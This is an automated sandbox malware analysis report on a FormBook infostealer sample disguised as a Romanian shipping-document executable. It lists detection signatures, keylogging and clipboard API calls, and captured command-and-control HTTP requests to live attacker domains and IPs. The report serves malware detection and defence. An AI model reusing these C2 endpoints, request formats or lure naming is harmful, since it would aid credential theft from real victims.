Windows Analysis Report
AWB_5771388044 Documente de expediere.exe

AI detected suspicious sample

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2584855517.0000000003750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2584715136.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2583125879.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2016788677.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2584635635.0000000002A20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2017207373.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2586189448.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2016510291.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: AWB_5771388044 Documente de expediere.exe

Joe Sandbox ML: detected

Source: AWB_5771388044 Documente de expediere.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hcwvcDPvVeAzsY.exe, 00000006.00000002.2583629834.0000000000C7E000.00000002.00000001.01000000.00000005.sdmp, hcwvcDPvVeAzsY.exe, 00000008.00000002.2583406804.0000000000C7E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: AWB_5771388044 Documente de expediere.exe, 00000000.00000003.1380185772.0000000003700000.00000004.00001000.00020000.00000000.sdmp, AWB_5771388044 Documente de expediere.exe, 00000000.00000003.1378980100.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1918412588.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2016840599.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2016840599.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916159024.0000000003200000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000007.00000003.2018602151.000000000380B000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000007.00000002.2585104371.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000007.00000002.2585104371.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000007.00000003.2016788999.0000000003657000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sc.pdbUGP source: svchost.exe, 00000002.00000003.1985783468.000000000303B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1984241134.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hcwvcDPvVeAzsY.exe, 00000006.00000002.2583838367.0000000000E49000.00000004.00000020.00020000.00000000.sdmp, hcwvcDPvVeAzsY.exe, 00000006.00000003.1952567703.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: AWB_5771388044 Documente de expediere.exe, 00000000.00000003.1380185772.0000000003700000.00000004.00001000.00020000.00000000.sdmp, AWB_5771388044 Documente de expediere.exe, 00000000.00000003.1378980100.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1918412588.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2016840599.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2016840599.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916159024.0000000003200000.00000004.00000020.00020000.00000000.sdmp, sc.exe, sc.exe, 00000007.00000003.2018602151.000000000380B000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000007.00000002.2585104371.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000007.00000002.2585104371.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000007.00000003.2016788999.0000000003657000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sc.pdb source: svchost.exe, 00000002.00000003.1985783468.000000000303B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1984241134.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hcwvcDPvVeAzsY.exe, 00000006.00000002.2583838367.0000000000E49000.00000004.00000020.00020000.00000000.sdmp, hcwvcDPvVeAzsY.exe, 00000006.00000003.1952567703.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: sc.exe, 00000007.00000002.2583431211.000000000346E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000007.00000002.2585504676.0000000003FEC000.00000004.10000000.00040000.00000000.sdmp, hcwvcDPvVeAzsY.exe, 00000008.00000002.2584883100.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2307969500.000000000E84C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: sc.exe, 00000007.00000002.2583431211.000000000346E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000007.00000002.2585504676.0000000003FEC000.00000004.10000000.00040000.00000000.sdmp, hcwvcDPvVeAzsY.exe, 00000008.00000002.2584883100.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2307969500.000000000E84C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A0445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00A0445A
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A0C6D1 FindFirstFileW,FindClose,	0_2_00A0C6D1
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A0C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00A0C75C
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A0EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A0EF95
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A0F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A0F0F2
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A0F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00A0F3F3
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00A037EF
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A03B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00A03B12
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A0BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00A0BCBC
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_0322CA10 FindFirstFileW,FindNextFileW,FindClose,	7_2_0322CA10

Source: C:\Windows\SysWOW64\sc.exe	Code function: 4x nop then xor eax, eax	7_2_03219F90
Source: C:\Windows\SysWOW64\sc.exe	Code function: 4x nop then pop edi	7_2_0321E5AA
Source: C:\Windows\SysWOW64\sc.exe	Code function: 4x nop then mov ebx, 00000004h	7_2_038404EE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49889 -> 108.179.253.197:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49889 -> 108.179.253.197:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49925 -> 108.181.189.7:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49940 -> 108.181.189.7:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49932 -> 108.181.189.7:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49948 -> 108.181.189.7:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49948 -> 108.181.189.7:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49964 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49970 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49983 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49983 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49977 -> 13.248.169.48:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.avalanchefi.xyz

Source: Joe Sandbox View

IP Address: 13.248.169.48 13.248.169.48

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00A122EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00A122EE

Source: global traffic	HTTP traffic detected: GET /7n6c/?tJ=iJE0gvFHj8PDX8qP&HvrT-t9X=ePeKNPyUeLpNn1usywRT/cMVaB/hHeJrwPLb6fKcgQCso5jGZqjP6M9GYYTFao+4npn6icqsLwsi7nEjf66U/gVo6YEkdyxhX4vgPFwxoIoJ2c6DSA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bloodbalancecaps.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Source: global traffic	HTTP traffic detected: GET /xu9o/?HvrT-t9X=Y1SnkQLh9oyCIrW1nUOSuZnR7CuPFYt1zoY93P6OWbCvdS06v54NadN0bxhIZaxlyI96f1lIInN9xaPSBVcrcY9ba19Ly4xWTmryN/t4ZE1RM2wdiA==&tJ=iJE0gvFHj8PDX8qP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.jalan2.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Source: global traffic	HTTP traffic detected: GET /ctta/?tJ=iJE0gvFHj8PDX8qP&HvrT-t9X=73htI/07lnbi6jhigENtqW+dHv4h0dKivRRSV4arkt57XDlKC2xJvna+Jje1nWd5k0Z3PS0VVZTw4ek7NFPoKT3ngGEEhsGl0ikPp1D77RlGeR3ylg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.avalanchefi.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30

Source: global traffic	DNS traffic detected: DNS query: www.bloodbalancecaps.shop
Source: global traffic	DNS traffic detected: DNS query: www.jalan2.online
Source: global traffic	DNS traffic detected: DNS query: www.avalanchefi.xyz

Source: unknown

HTTP traffic detected: POST /xu9o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.jalan2.onlineOrigin: http://www.jalan2.onlineReferer: http://www.jalan2.online/xu9o/Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 197Cache-Control: max-age=0User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30Data Raw: 48 76 72 54 2d 74 39 58 3d 56 33 36 48 6e 6d 69 69 37 39 65 36 5a 61 44 49 36 54 53 62 6c 71 66 57 73 56 72 4b 54 35 74 77 69 59 35 5a 30 39 7a 72 57 36 2b 51 66 54 78 4e 72 72 51 75 58 39 56 63 64 45 51 33 4c 4a 77 6e 38 36 78 35 55 56 74 4c 63 55 45 42 68 61 4c 6a 47 6e 77 6c 4d 72 30 69 4c 55 74 43 75 4a 4a 66 56 6c 57 33 4e 74 46 67 58 31 64 74 56 47 6f 30 2b 71 61 48 56 42 4b 6b 6a 38 52 6f 63 52 31 69 53 52 55 62 68 4b 69 4f 70 39 35 56 46 70 38 7a 69 49 6b 72 6d 49 7a 34 36 52 52 30 53 6f 48 6b 55 5a 6f 45 4b 56 4d 76 72 46 44 4a 69 2f 34 76 70 74 56 57 72 4c 64 55 41 39 48 2b Data Ascii: HvrT-t9X=V36Hnmii79e6ZaDI6TSblqfWsVrKT5twiY5Z09zrW6+QfTxNrrQuX9VcdEQ3LJwn86x5UVtLcUEBhaLjGnwlMr0iLUtCuJJfVlW3NtFgX1dtVGo0+qaHVBKkj8RocR1iSRUbhKiOp95VFp8ziIkrmIz46RR0SoHkUZoEKVMvrFDJi/4vptVWrLdUA9H+

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachedate: Mon, 09 Dec 2024 16:19:13 GMTserver: LiteSpeedcontent-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkedconnection: closeData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a Data Ascii: a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachedate: Mon, 09 Dec 2024 16:19:16 GMTserver: LiteSpeedcontent-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkedconnection: closeData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a Data Ascii: a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachedate: Mon, 09 Dec 2024 16:19:18 GMTserver: LiteSpeedcontent-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkedconnection: closeData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a Data Ascii: a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachecontent-length: 1249date: Mon, 09 Dec 2024 16:19:21 GMTserver: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75

Source: sc.exe, 00000007.00000002.2585504676.00000000043D4000.00000004.10000000.00040000.00000000.sdmp, hcwvcDPvVeAzsY.exe, 00000008.00000002.2584883100.00000000033F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2307969500.000000000EC34000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://bloodbalancecaps.shop/7n6c/?tJ=iJE0gvFHj8PDX8qP&HvrT-t9X=ePeKNPyUeLpNn1usywRT/cMVaB/hHeJrwPLb
Source: hcwvcDPvVeAzsY.exe, 00000008.00000002.2586189448.00000000054DE000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.avalanchefi.xyz
Source: hcwvcDPvVeAzsY.exe, 00000008.00000002.2586189448.00000000054DE000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.avalanchefi.xyz/ctta/
Source: sc.exe, 00000007.00000003.2202126445.000000000815E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: sc.exe, 00000007.00000003.2202126445.000000000815E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sc.exe, 00000007.00000003.2202126445.000000000815E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sc.exe, 00000007.00000003.2202126445.000000000815E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: sc.exe, 00000007.00000003.2202126445.000000000815E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sc.exe, 00000007.00000003.2202126445.000000000815E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: sc.exe, 00000007.00000003.2202126445.000000000815E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: sc.exe, 00000007.00000002.2583431211.000000000348B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: sc.exe, 00000007.00000002.2583431211.000000000348B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: sc.exe, 00000007.00000003.2197201669.0000000008139000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: sc.exe, 00000007.00000002.2583431211.000000000348B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: sc.exe, 00000007.00000002.2583431211.000000000348B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033E$
Source: sc.exe, 00000007.00000002.2583431211.000000000348B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: sc.exe, 00000007.00000002.2583431211.000000000348B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sc.exe, 00000007.00000003.2202126445.000000000815E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: sc.exe, 00000007.00000003.2202126445.000000000815E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00A14164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00A14164

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00A14164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00A14164

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00A13F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00A13F66

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00A0001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00A0001C

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00A2CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00A2CABC

E-Banking Fraud

Binary is likely a compiled AutoIt script file

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2584855517.0000000003750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2584715136.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2583125879.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2016788677.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2584635635.0000000002A20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2017207373.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2586189448.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2016510291.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: This is a third-party compiled AutoIt script.	0_2_009A3B3A
Source: AWB_5771388044 Documente de expediere.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: AWB_5771388044 Documente de expediere.exe, 00000000.00000000.1343977915.0000000000A54000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_2d3cdb91-3
